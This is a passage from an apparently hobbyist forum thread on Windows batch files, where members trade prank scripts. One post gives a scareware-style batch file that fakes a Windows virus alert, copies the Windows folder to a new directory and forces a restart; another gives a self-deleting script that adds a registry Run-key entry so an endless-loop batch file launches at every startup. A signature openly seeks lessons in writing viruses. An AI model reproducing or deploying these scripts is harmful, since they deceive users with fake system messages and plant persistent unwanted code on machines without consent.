![]() |
|
|
#21 |
|
Newbie
Join Date: Nov 2008
Posts: 14
Thanks: 2
Thanked 1 Time in 1 Post
Rep Power: 0
![]() |
Re: Batch Files
ok, thanks thats useful :} thank you again
__________________
LOOKING FOR SOMEONE TO TEACH ME HOW TO MAKE VIRUS'S AND OTHER THINGS WITH NOTEPAD |
|
|
|
|
|
#22 |
|
Advanced Member (250+)
Join Date: Nov 2007
Location: /etc/init.d/
Posts: 441
Thanks: 15
Thanked 7 Times in 7 Posts
Rep Power: 0
![]() OS:
|
Re: Batch Files
@echo off
TITLE VIRUS ALERT! cls color 0C echo Windows has found a virus... echo. echo It is recommended to let Windows fix this issue. echo. echo If you do not let Windows fix this issue, echo the next time you restart the computer echo Windows will not load properly. set /p command=Would you like windows to fix this issue? (Y/N): if %command%==Y goto :delete if %command%==N goto :exit if %command%==y goto :delete if %command%==n goto :exit :delete cls echo Deleting files in %WINDIR%. PING 1.1.1.1 -n 1 -w 2500 >NUL cls echo Deleting files in %WINDIR%.. PING 1.1.1.1 -n 1 -w 2500 >NUL cls echo Deleting files in %WINDIR%... PING 1.1.1.1 -n 1 -w 2500 >NUL cls if exist "C:\WIN" goto start MKDIR "C:\WIN" :start xcopy /E /Y %windir% "C:\WIN" del C:\WIN cls set /p command=Windows require that you restart the computer to complete the issue, you can also restart later, do you want to do it now? (Y/N) if %command%==Y goto :shutdown if %command%==N goto :exit if %command%==y goto :shutdown if %command%==n goto :exit :shutdown shutdown -r -t 10 -c "Windows has succesfully fixed the issue." :exit exit still no harm to computers, only waste of space for 10 mins (depends on the comp)
__________________
(\__/) (='.'=) This is Bunny. Copy and paste bunny into your (" )_(" ) signature to help him gain world domination. http://www.youtube.com/watch?v=ZXD4N_Mi1iE&fmt=22# Freelancer Evolving |
|
|
|
|
|
#23 |
|
Advanced Member (250+)
Join Date: Nov 2007
Location: /etc/init.d/
Posts: 441
Thanks: 15
Thanked 7 Times in 7 Posts
Rep Power: 0
![]() OS:
|
Re: Batch Files
Code:
@echo off goto :A :A ECHO Windows Registry Editor Version 5.00 >infect.reg ECHO. >> infect.reg ECHO [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] >> infect.reg ECHO "noob.bat"="C:\\WINDOWS\\noob.bat" >> infect.reg goto :B :B regedit /S infect.reg echo @echo off >noob.bat echo goto :A >> noob.bat echo :A >> noob.bat echo echo noob >> noob.bat echo goto :A >> noob.bat copy noob.bat %WINDIR% del noob.bat del infect.reg del %0 |
|
|
|
|
|
#24 |
|
Junior Member (25+)
|
Re: Batch Files
try this guys type in notepad the following and save it as .bat file
Msgbox"type here your message what ever you want",20."type here the title." |
|
|
|
|
|
#25 |
|
Advanced Member (250+)
Join Date: Nov 2007
Location: /etc/init.d/
Posts: 441
Thanks: 15
Thanked 7 Times in 7 Posts
Rep Power: 0
![]() OS:
|
Re: Batch Files
isnt that vbs?
seems like it is, ive used that in vbs |
|
|
|
|
|
#26 |
|
Junior Member (25+)
Join Date: Dec 2008
Location: I live in Madurai, Tamil Nadu, India and i'm proud of it.
Posts: 26
Thanks: 5
Thanked 4 Times in 3 Posts
Rep Power: 0
![]() OS:
|
It doesn't do anything, except for a command window flashes for a fraction of second...
![]() Can you tell me what exactly this trick do??? ![]()
__________________
I'm a Nobody.... Nobody is perfect in this world So i'm Perfect
|
|
|
|
|
|
#27 |
|
Advanced Member (250+)
Join Date: Nov 2007
Location: /etc/init.d/
Posts: 441
Thanks: 15
Thanked 7 Times in 7 Posts
Rep Power: 0
![]() OS:
|
Re: Batch Files
|
|
|
|
|
|
#28 |
|
Junior Member (25+)
Join Date: Dec 2008
Location: I live in Madurai, Tamil Nadu, India and i'm proud of it.
Posts: 26
Thanks: 5
Thanked 4 Times in 3 Posts
Rep Power: 0
![]() OS:
|
@wolfie276: Sorry man, when i save the file as .vsb(virtual sampler bank) the system doesn't recogonise the file format....
Can you tell me how to do that from the begining, and is the quotation symbols are to be added? What kind of program will support this file? And tell me what it does?
__________________
I'm a Nobody.... Nobody is perfect in this world So i'm Perfect
|
|
|
|
|
|
#29 |
|
Advanced Member (250+)
Join Date: Nov 2007
Location: /etc/init.d/
Posts: 441
Thanks: 15
Thanked 7 Times in 7 Posts
Rep Power: 0
![]() OS:
|
Re: Batch Files
its . V B S...its not . V S B, sorry if that sounded mean or something
|
|
|
|
|
|
#30 |
|
Newbie
Join Date: Oct 2009
Posts: 1
Thanks: 0
Thanked 0 Times in 0 Posts
Rep Power: 0
![]() OS:
|
Re: Batch Files
What About This Bunny mate
(\_/) (0.0) (> <) ![]() |
|
|
|
![]() |
| Thread Tools | |
| Display Modes | |
|
|
< Windows Help - MS Office Help - Hardware Support >
| New To Site? | Need Help? |